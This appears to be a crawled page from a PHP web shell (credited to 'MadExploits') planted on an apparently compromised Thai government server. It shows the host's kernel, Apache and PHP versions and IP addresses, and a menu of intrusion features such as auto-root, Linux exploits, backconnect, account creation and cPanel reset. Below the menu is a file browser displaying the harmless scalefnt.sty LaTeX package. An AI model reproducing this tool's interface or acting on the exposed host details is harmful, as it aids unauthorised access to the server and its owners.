Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
texmf /
tex /
latex /
carlisle /
[ HOME SHELL ]
Name
Size
Permission
Action
blkarray.sty
70.37
KB
-rw-r--r--
comma.sty
2.85
KB
-rw-r--r--
dotlessj.sty
3.06
KB
-rw-r--r--
fix2col.sty
7.71
KB
-rw-r--r--
ltxtable.sty
3.78
KB
-rw-r--r--
mylatex.ltx
8.09
KB
-rw-r--r--
nopageno.sty
947
B
-rw-r--r--
plain.sty
7.55
KB
-rw-r--r--
remreset.sty
1.07
KB
-rw-r--r--
scalefnt.sty
1.33
KB
-rw-r--r--
slashed.sty
5.2
KB
-rw-r--r--
typehtml.sty
24.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : scalefnt.sty
% scalefnt package %%%%%%%%%%%%%%%%%% % Copyright 1997 David carlisle % This file may be distributed under the terms of the LPPL. % See 00readme.txt for details. % 1997/09/28 David Carlisle % This package defines a command \scalefont. After \scalefont{.75} then % the current font and baselineskip will be scaled to 75% of their % original size. Any scale factor may be specified. % If you are using traditional fd files based on bitmap font sizes, % LaTeX's font system will round the requested font size to the nearest % available size. If you are using scalable fonts, such as the psnfss % or type1cm packages, then the requested font size will be used exactly. % Almost all of the code here is in fact dealing with scaling the stretch % components of \baselineskip. This is a bit odd as 99% of documents % have a rigid \baselineskip, however the technique may be useful in % some contexts, and is left here as an example. \DeclareRobustCommand\scalefont[1]{% \dimen@\z@ \dimen@ii\z@ \afterassignment\@scalefont \@tempdima\the\baselineskip\relax\relax\relax\relax\relax \skip@#1\@tempdima\@plus#1\dimen@\@minus#1\dimen@ii \dimen@\f@size\p@ \dimen@#1\dimen@ \fontsize\dimen@\skip@\selectfont} \def\@scalefont#1#2#3#4#5{% \if#1p% \afterassignment\@scalefont\dimen@#5% \else \if#1m% \dimen@ii \fi \fi}
Close